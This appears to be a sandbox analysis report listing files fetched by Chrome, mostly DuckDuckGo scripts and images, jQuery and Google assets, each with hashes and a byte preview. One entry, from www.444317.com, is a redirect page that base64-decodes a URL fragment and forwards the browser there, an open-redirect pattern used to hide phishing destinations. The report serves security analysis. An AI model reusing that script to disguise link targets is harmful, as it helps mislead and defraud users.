                                                                                                                                                            Preview:.PNG........IHDR...B.........Lh!K....PLTE...***..............................................................................(((.w......../...3i....5@.F............x........<s.BBB...9i.]]^...effZ..www....C5...yyy666...4.S........?.......X.....=..........A.....R........PPP.P.JKK...C..O....V.....[.E...h..a.J..T..C....#..........................+..r.L..kkkN......>r.m..3....U.......@..:.....I....ppp.?J.x.Qo.G............9m...........T......k.........c...H...blm.................#K|......2..%}..tu8........?..c..........A..}...C..............:\...I...RY...`.v.....d^k4.nnn--...c.....e..... !.....?...>.l... ..v...NI.a6.D..............T...... ........]....9........i2.......C]..p..........|"...s...dO{.Y+.....'*...X.qe....BL.W...........g...../[..9... _4....tRNS......"..&..R..ev...g`VM.ii....IDATx........0..iv..*.c.....................c.L.".a(..]....KY.t.l..UI...(.Y.x,.....v.._.z.........a r.LN.I)..3&..7..z..@.Ef....-0.25D`.^.<>..{..%Y{.q.m)D.>
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (10874), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):10874
                                                                                                                                                            Entropy (8bit):5.248844428576748
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:LsCn5FaZOYdr8+Z0+nInmGPDLCpAlZ/cWNsQDmxW8TVXg:AYsOY2+JnCPCmX198dg
                                                                                                                                                            MD5:6E0FCBE2C3A659497E9C6D2BD4754FAA
                                                                                                                                                            SHA1:BA2E41DA4A1BB1077DE1D8F6533CAC7994864C5C
                                                                                                                                                            SHA-256:1B0F1B75314E3A6EA51DF8AD0D3DB12670463FFEDEACCC336C5BAB025D424F82
                                                                                                                                                            SHA-512:02365DB3BC9038DA6D9E58ED7DCCEE6AB198B5E8BBAEF0FB15964B543A4C4D5DBFACFD2EDDC3C68C20B490557918BE068B9C268A2F7CE80FBC8A1ADFEDF9B66D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/36926-f40b7b74564e6c28.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[36926],{93275:function(e,t,n){"use strict";n.d(t,{Hk:function(){return k},KF:function(){return E},Qd:function(){return C},UQ:function(){return O},bB:function(){return S}});var r=n(67294),a=n(45558),o=n(94411),u=n(69695),i=n(40884),l=n(61331),d=n(24683),s=n(12837),c=n(28274),f=n(765);function p(){return p=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},p.apply(this,arguments)}function v(e,t){if(null==e)return{};var n,r,a={},o=Object.keys(e);for(r=0;r<o.length;r++)n=o[r],t.indexOf(n)>=0||(a[n]=e[n]);return a}var y,h=["as","children","defaultIndex","index","onChange","readOnly","collapsible","multiple"],b=["as","children","disabled","index"],m=["as","children","onClick","onKeyDown","onMouseDown","onPointerDown","tabIndex"],_=["as","children"],g=(0,c.nm)("AccordionDescendantContext"),x=(0,a.o)("AccordionContext",{}),w=(0,
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (3643), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3643
                                                                                                                                                            Entropy (8bit):4.617214519044779
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:CFIg9tSlAAbgyiSsgWnIlVAYbgptFVn3i:CtoAfkrpV6ptj3i
                                                                                                                                                            MD5:2CCCE833718FE6BAA68CD71D70994EA2
                                                                                                                                                            SHA1:D70E4AD3840ED244AA3808F7AF9A6CA288C5A6FD
                                                                                                                                                            SHA-256:257056F5FEE6445BBD3C2E50CBCD3F3956359E515E26108737B0A37DB973BC0C
                                                                                                                                                            SHA-512:E982233B83A045AEF46AD142A71182C660B05490198A01A4AE93CA9AB9C8CC7FD409BB53A86D6CABFC5BB8A79F34684316C04BC955E69B8CE531587694070117
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:self.__SSG_MANIFEST=new Set(["\u002F","\u002F410","\u002F411","\u002F412","\u002F418","\u002F50x","\u002F50x-nginxblock","\u002F50x-tq","\u002F[locale]","\u002F[locale]\u002Faichat\u002Fprivacy-terms","\u002F[locale]\u002Fapp","\u002F[locale]\u002Fcompare-privacy","\u002F[locale]\u002Fdbp","\u002F[locale]\u002Fdbp\u002Fdashboard","\u002F[locale]\u002Fdbp\u002Fprofile","\u002F[locale]\u002Fdbp\u002Fprofile\u002Faddresses","\u002F[locale]\u002Fdbp\u002Fprofile\u002FbirthYear","\u002F[locale]\u002Fdbp\u002Fprofile\u002Fnames","\u002F[locale]\u002Fdbp\u002Fprofile\u002Fwelcome","\u002F[locale]\u002Fextension-success","\u002F[locale]\u002Fidentity-theft-restoration","\u002F[locale]\u002Fidentity-theft-restoration\u002Fabout","\u002F[locale]\u002Fidentity-theft-restoration\u002Fcall","\u002F[locale]\u002Fidentity-theft-restoration\u002Fcall\u002Ffeedback","\u002F[locale]\u002Fidentity-theft-restoration\u002Firis","\u002F[locale]\u002Fmac","\u002F[locale]\u002Fonion-home","\u002F[locale]\u002
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):89501
                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 598 x 1114, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):92229
                                                                                                                                                            Entropy (8bit):7.986327668700224
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:AXfv3ose6Cd3X6pQnXJaoCXtvPAynhE6I5FPWEvQ/Ctf4mbGEttXxeMuRnztVBA:aPSZdqQXgXvPAshEz5YXmbGEvXxZuxj6
                                                                                                                                                            MD5:6DFB140084554026C9F09A77F12F2860
                                                                                                                                                            SHA1:3014B06321E100BFEFCDF9BABF6D95D594F0B88B
                                                                                                                                                            SHA-256:7734FD711FA3B761C905C5A950E0D5F215EB6C9EF53DA62C2EB3BA4B8F17F9D4
                                                                                                                                                            SHA-512:BFC981CDB5229AE69370B262BA3DB91A70C712CEA5C93C5382389FC5C6C8C9D11D60F859C8760ADBE2FBE5E353426226186FC6A3718345FDF70CE388CED582EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png
                                                                                                                                                            Preview:.PNG........IHDR...V...Z......i.l....PLTE..............................................................................W3....................m$#$.........................................................544|||...................................@@@-,,..........ttu9'..^<RF@......<1(,".G<6......nnmIII...I7*ggf,.......V6"I..__^........fD0\NG...hG.............SC0...XXW.....QPO...e!.W...........gXQq.Wsd\..9}pe.mcY5..x.}n.v\..g.+Oi...............v.x...EG......~...s[E..o..U.b0.j...I..iH.{_...b.gS..uN7...f;!......v:.vE"..+.rS......q+.r?.[>.N(..#.zP..^/.....O....w......7J.x..F......[D...S"?U.5~o?.^..U...............c....w{....{[+onH.p..l.T..~...YyY....2...9i.@..&H`..?..>ac......e.G..M...s..f.f.X.rS......P0...w....."....?*.0$.5..zW`y...y....&A^P...X.........tRNS....!........{Hjd.Z......d.IDATx..............................=8........m.UUUU.+...a........7.w'.j.5.......bEO...;.4.`.B?.N......1.\..;...))....d....*cm8.........T.Q........c..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (974), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):974
                                                                                                                                                            Entropy (8bit):5.262662795433932
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:+dbjJ3SfgEdIuWe0Vrw4sVhbPEAEoKASjfa+AoXA5A++rm+sTAdb+sS0f+sjf+sT:ibjlAdIZ9wVNEnXvjVxbqEqxPdEJR
                                                                                                                                                            MD5:28B266E9ADD6DDDFF88394BF47B32A87
                                                                                                                                                            SHA1:8E004C3ED876459A25D74FB13B44A394650B25E5
                                                                                                                                                            SHA-256:F558A71010B7B51B429A07A9B064B80143007052FB97E3A3B5E09B9AADE37638
                                                                                                                                                            SHA-512:48F1D5BDD9EADD6D1308E2B8261EB1996BF01DA6443A26B5934A2DF57C8E023CE7A48C7FECCE97BE8C48DEE9C022BA20DACE39DBFDF114EEB7B375A85FFB1915
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/78597.c875db33140f7df5.js
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[78597],{64009:function(o,i,n){n.r(i),n.d(i,{default:function(){return d}});var s=n(45697),l=n.n(s),e=n(14085);function d(o){var i=o.mobileOnly,n=void 0!==i&&i,s=o.desktopOnly,l=void 0!==s&&s,d=o.iosOnly,t=void 0!==d&&d,a=o.androidOnly,c=void 0!==a&&a,r=o.macOnly,v=void 0!==r&&r,O=o.windowsOnly,b=void 0!==O&&O,p=o.notMac,u=void 0!==p&&p,y=o.notWindows,k=void 0!==y&&y,w=o.notSafari,f=void 0!==w&&w,D=o.notIPadOS,M=void 0!==D&&D,S=o.children,h=(0,e.Z)();return h?f&&h.isSafari?null:t&&h.isMobileDevice&&h.isIos||c&&h.isMobileDevice&&h.isAndroid||n&&h.isMobileDevice||l&&h.isDesktop||v&&h.isDesktop&&h.isMacOS||b&&h.isDesktop&&h.isWindows?S:(!u||!1!==h.isDesktop&&!1!==h.isMacOS)&&(!k||!1!==h.isDesktop&&!1!==h.isWindows)?M&&!1===h.isIPadOS?S:null:S:null}d.propTypes={mobileOnly:l().bool,desktopOnly:l().bool,macOnly:l().bool,windowsOnly:l().bool,notMac:l().bool,notWindows:l().bool,children:l().any}}}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1045
                                                                                                                                                            Entropy (8bit):4.935566191494263
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:eKBMJZ55ou7mYVf5BxZjQDS2Yb6sIZWs04Nob:eKBAPnNHjQDS967osnNG
                                                                                                                                                            MD5:B3815812759AEF37E6AC5C136929E620
                                                                                                                                                            SHA1:F0752DDBF8899E1A363D585AEBC2496F5D5CCDD0
                                                                                                                                                            SHA-256:FB3E9739D9EBB8A801C1191595E10DE993B4BFDEB49463295B9F63B6C663B09B
                                                                                                                                                            SHA-512:7E98BA97827552D357F34851E9FF6BD7F10FAE2DE266F71328638562B6D622343E5E61C0D6D8449E056ABD389C5816599B6B83DFF6EDDC0F9B3C3A786D1CA44A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://www.444317.com/
                                                                                                                                                            Preview:<scriptlanguage="javascript">.<html lang="en">.<head>.<meta charset="UTF-8">.<title>Redirect</title>.<script>.function base64DecodeUrl(str){. return decodeURIComponent(atob(str).split('').map(function(c) {. return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);. }).join(''));.}..window.onload = function() {. var hash = window.location.hash.substr(1); // Get the fragment after the '#'. var url;.. if (hash && hash.substr(0, 4) === 'http') {. url = hash; // If the fragment starts with 'http', use it as the URL. } else {. if (hash.includes('/')) {. url = base64DecodeUrl(hash.split('/')[0])+hash.split('/')[1]; // If not, try to base64 decode it. } else {. url = base64DecodeUrl(hash); // If not, try to base64 decode it. }. }.. if (url && /^(https?:\/\/)/.test(url)) { // Regex to check if the url starts with 'http://' or 'https://'. window.location.href = url; // If it's a valid URL, redirect. }.};.</scr
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1280x800, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):480460
                                                                                                                                                            Entropy (8bit):7.862355731812106
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:3qer4Xv4nQpxK9yhf0M44bwmfDmALSxrLVvzJ8W:TrsQnCc9yhf0h4lqALiLVvzT
                                                                                                                                                            MD5:D36EB7E32F015110E3768456903D8BAD
                                                                                                                                                            SHA1:4C69A6A6B981951BAD24366C571B619A4E48AE90
                                                                                                                                                            SHA-256:66DA24B66017DECA6FCA7C5CBC88D849835D7DB8BE3CBE558FE73521F118229F
                                                                                                                                                            SHA-512:F565F302384DF2CCA9FD20D1BEE071A12CB95FE95F2648F79A827D88D3393B2FA125ADAF93CADC23A829911624E29008E33B826018E62505D6A9665549CD263F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/76r3coCYiap7WJa2ejEtQWUi079TowbnyCcrB1-HZy6Y0bohWW9uND5CaLQynHKafxPA0QZtokCNBJDREctbw7xD=s1280-w1280-h800
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C....................................................................... .................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(......8..lV.f..O...u?.=................_.F...........=q._..\..S..&.......,+.......?.jv....#.}sN....7w.............Op/...<.....Q......C2:.........?.......i..Z....&............&...J.........D...................../........O.1.-.....?Z..l7#...~..1.............)..7y....'..:vC.o....s.v.qI........,.:.....b.v.q...s.8...O.5.q7.l~Y......0..?..=.........?.....o.(..?
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (2051)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):14684
                                                                                                                                                            Entropy (8bit):5.466852947616851
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:IYikmqAScZ+Ad7y0B6nfCHa3rFC+5aiWQLHO91RIuW:IqmqAeA1B2KgrrW2f
                                                                                                                                                            MD5:95028A4E3FD66AF73F1C6733C387208A
                                                                                                                                                            SHA1:99E4FDABDDBA5CA768CB171E3726B4008A89AE6A
                                                                                                                                                            SHA-256:3D49439AEE51F4DCB87B5C6B7910AA3145B0584F59FF6ABEFCC398C2ABFFC30C
                                                                                                                                                            SHA-512:04F97D3D4CDC8C89018006F5C4470952DAB958CEC311A6C545BA1C304B339624AE09ED1D97401446B8619A6DC90B1180972280127B5793C316A287F2F39AE1DF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://apis.google.com/js/googleapis.proxy.js?onload=startup
                                                                                                                                                            Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 1984 x 1164, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):149591
                                                                                                                                                            Entropy (8bit):7.96734440315515
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:MQ5UHmRkjQu2nzLavwNpRIR4V11GGV4Ov1k5BiZAtdmUDVO4C9:uHmRsQJzLtV6M7oG1k58ZAtah9
                                                                                                                                                            MD5:12617AA39B87128318AEFA6D49468772
                                                                                                                                                            SHA1:32EF23AD418305B6DB993FDD593AE7A12EC4DE7D
                                                                                                                                                            SHA-256:0D808AECD8D2AFEEF070CBE93F79678F89027DEABB5A414DF2421AA7D1C835F4
                                                                                                                                                            SHA-512:9E05220AF715EA5B1233909BEB6D61822481E0B27FCB2742D67A5FA1737C66D32A12D90F2EA15962F3A1D9945D605BC0AA15CE36B3BC61EA32EA934C04D04788
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices-light.png
                                                                                                                                                            Preview:.PNG........IHDR...............g.....PLTE...@@TGXf-/627HMPi<G^06DKLk5:G.!.5Ah5Cj$)1.&10?_.5M2Ca...0Ba......2@c2<_0=b......1?b0@a.....$.=a.../=a-=^.........1?b.<`/=_....../>a...............................................................................................................................X3...333..........W3.......W2....X3....Y4............fff.......X3...L.<................___..."""ddd'''..3...}}}........3yyyLLL.........)))...???aaa..............sssXXX.b?.........000..ppp.....f.mM.......===......BBB=.,...<.H........_[..?......DDD...666.................r.vYE.5..4...lL...iii...ooo......CY...5lll.kKCX...f.3.c3.2..3..3.tX5.9..4..X.A.i5...s3.F%.....\o..........X.iH..6....m.c...........y.8...YV.HF.G-......OMNc...yr......n.Hd.0..@.nBX.U`....FtRNS....................#...1(&#(+.l.jl..#;WH0.b.G.U......p...r`\..l...+.....D.IDATx.....@..a..7$j.......$.....*.].f2.........I&}...+.v..s..q...Ag......~...h.....xh...........6......N.C.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x297, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12330
                                                                                                                                                            Entropy (8bit):7.5155551942923235
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PW+mkZcqmyARZkql7STR7hWK9gPZLDCmNuf:PfJZcqWZkql7cRMK94ZLDCmNo
                                                                                                                                                            MD5:964C26057DA534FE411CB4AA61DAEAE9
                                                                                                                                                            SHA1:2316937CD047A36038CF30149F47764EC01D4BCD
                                                                                                                                                            SHA-256:04ECC654F7BD934EF2DF87EA5BD21175B86BA0C2D9CB75FABDADCC87BC3A59B7
                                                                                                                                                            SHA-512:813299CCFEC179A099AD6244241568B97F242E2B03A7D88547586E68DE11A448F727BDAE55EF6BB9623C587012F50DF4EC42C89B01E9CF9F2E7A14EEABDC6BB3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................).d...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..5.#...;.|z}:c..D........\...]..1.....R....y.V+...........x..........K.....9.}...'=~..........|...o..../..:..{...... .K.../.N.....3.. .v?.>.~T.......N:..]z..%`.=q.^..1. dd...=).\.....wq<.20.lt..A.zs.E.....O.....[...n1....OA..<............./.L9.......y........^y......=x.O..\.2x..;.5Ko.....................U...r.X<....:.j.N..sU.'...E.Q.|s.9....ONy......gR....[
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (13182), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13182
                                                                                                                                                            Entropy (8bit):5.392703891978581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:qLNdbt6TJXWRQlWWvqShHH7nJESvXmr8rGS38UQ3fw7V+DG1GB:WQUSpbmSvXGI7SuGB
                                                                                                                                                            MD5:F6DB9F424BC80791AEF94E454362D1AE
                                                                                                                                                            SHA1:966FFC2EC41E7F59CA8E36C4E6F1AC2BD9D63A25
                                                                                                                                                            SHA-256:153BA80333B839710D5C20A6C363D6EC0493BC33F9285F80CF198E9B900B61C7
                                                                                                                                                            SHA-512:14954CCB4E1D779055C26CC543DF919DF4ABE5F5B768F2B2B4DF32E12E9909CC33F1000B60A2CAFD80EFCD365B123F97518C35EDFB9D9C2D7EA05A53DC66CB08
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[33817],{28746:function(e,t,r){"use strict";var o=r(59499),n=r(4730),i=r(91521),a=r.n(i),s=r(94184),c=r.n(s),l=r(43165),d=r(76029),u=r(85893),f=["as","className","borderRadius","elevation","dismissable","onDismiss"];function m(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,o)}return r}function p(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?m(Object(r),!0).forEach((function(t){(0,o.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):m(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var v=(0,l.j)((function(e,t){var r,i=e.as,s=e.className,l=e.borderRadius,m=void 0===l?"md":l,v=e.elevation,_=void 0===v?50:v,g=e.dismissable,h=void
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):11383
                                                                                                                                                            Entropy (8bit):7.958469961100936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:uSJhs0bwoV6+IU110b60wnbkKwSWi8nvEX+votDnD40C/gB/Lg0EEfyHDKzjNNel:RJ20bwS6+I+0b64KbWi8nvEgotzywjgj
                                                                                                                                                            MD5:280DD35F5047BD46EC2AFBEEA0FE6C23
                                                                                                                                                            SHA1:DE3A40EF70627FE05B54E44C68E7834686D0D388
                                                                                                                                                            SHA-256:D4692FB34E947C099A267AC1FBBDBFCDAEC064642385836FF2792E2506EC7D4C
                                                                                                                                                            SHA-512:A4B900B2289598424D9724B4ED21A753EB6E6BB2F6186FD0F4EE7642946DB93C454A458D5F9F0270C64B1DC6CA09C1050C00348C89D78ACE25E484594C99DF24
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/grain.png
                                                                                                                                                            Preview:.PNG........IHDR...d...d.....p.T....bKGD..............pHYs............... .IDATx.}.w..o..../.%.Z-..Z[Kk_....b0.l.8.......7s......7..=.L.....n....8v.....A...*.I8.#.....u.>.......3..:3k....x...W.Y.....G.,........2.Z...bf.3.3.~I.3....~......f.sKf6.{..7b.E3.cf...n3k..{...0~.6..~.........ef...3k6.1.7kfuf.#........Z..,~.........@..}..W..^.......O............e....x.(..l.^{ 5.z...j....l..'|....9...b..ef...Y..fhq.7...MW.h...h.....Y.O........mE3..5.!.zL$O....Z....F.c. ..!..i.w...f6I..f..k.f6..4....~.......".F.u.......`..DV.7We|i.[..Z.9.p....Tkf;1.F3.jf.nn..>.ef.h.....7..<...Y.'.....Nu...h......Y..;hfu......M.+$....2mf.|=r..nN.........q.d../.........r[.......f...&..;..Y2i{|......h.k.o...[.{;]...:i........p...eY.Y.._M......l.e.!..f. f... ."...`B.D......h...Cs.@..A.{...`.J.....r.u...I9& h..^..v.f7E.Pwp.#..f...+vh...d..f..~m0..Q.%3....f......D..:I.l3...j.&.g..V.L..$.~FA$.:.^G..&.m.M..u.6..).%..r...........# ...)..L."P.Z.q.;gFU.}G..\..8..=t.&l..&Y..3.......
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 866 x 565, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):34303
                                                                                                                                                            Entropy (8bit):7.977567147939618
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:d0c2njnh8tFUyLFpPU0GamXASajmXtV+hU2YbAG6kPOEWkXPRjK:B2njn61LvVVN/WOrmw
                                                                                                                                                            MD5:ED5AC3C5F537DE70AE3CF64A391C274E
                                                                                                                                                            SHA1:1C854A5885A7602B7D2052FC9CE932CEE7E6BED8
                                                                                                                                                            SHA-256:1378964BFEF8AAA51321B8A8E3184FBF2E330A64DD1AB703DF90A97A8980A6A5
                                                                                                                                                            SHA-512:306A2695A0A5CBBC05672C83D2E3B983561A8D026B67787925E1A31876589181728358E1176F10826C38E4A0A5584871DACCAA4E38DDFC3A60DB5F2721D6593B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png
                                                                                                                                                            Preview:.PNG........IHDR...b...5........[....PLTE&&&..................................................................w......../......3i.5@.F....x...........Y...C54.R>.....h.....^.P...Q.KKK.......W.G......p....V..J...>.A..C..L...#.R...,.....5.....I..w.......................{...........?r...@..F......@........d...<G\z..Q[^^^...'...../U.............u.........C.... Iz!!!...q..............@..Nl.>>>xxx....EP.....#....Y...........^f..Z.......eq---....RR...kkkc.....<.l9z....................x5........?`..ml.UH..;. .r....y....}.............n.......H.f'.>'.........U5.....qV.~..._..^.......G|....e..;..1.........uV.p.....^..U(...E.....h2..U.z..>.#.G.#1.....K#..^.8.n8..n.>../u^.,j.7....tRNS....."1*-...}uOA..ha..a....IDATx..............................=..m......./}...S...j[.........p.3..........@f...N.C+dhF@.QS..l@.E...R.2....T.s..b.$L.....49.a..'.......m.lX}.Y..FA...t........T...:..h..h..V5edX.......}.6'F...rw;._.m....7.o.......U.a.KX...2..._B....yR...rJ.(G.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:HKALn:qAL
                                                                                                                                                            MD5:C6CB4F21C7DCEB18C48B802BDE96868D
                                                                                                                                                            SHA1:D44E74B07ED4E8267728C2BCDD16599E9110D05B
                                                                                                                                                            SHA-256:B77A3071A80FC28A1E314D251064103CF265866101F7CDCCCF00B77C80484BD5
                                                                                                                                                            SHA-512:8C65A0458DD4A8B93AEEA70A0CA67DB43B6E1C0DAAB17B7091449335532F3F5489E5B8A1617B42B99EE95B66CD8EF3E572F537121C9960743E100FE560F4C0F0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlZWeYb0hIrhBIFDT0fUzw=?alt=proto
                                                                                                                                                            Preview:CgkKBw09H1M8GgA=
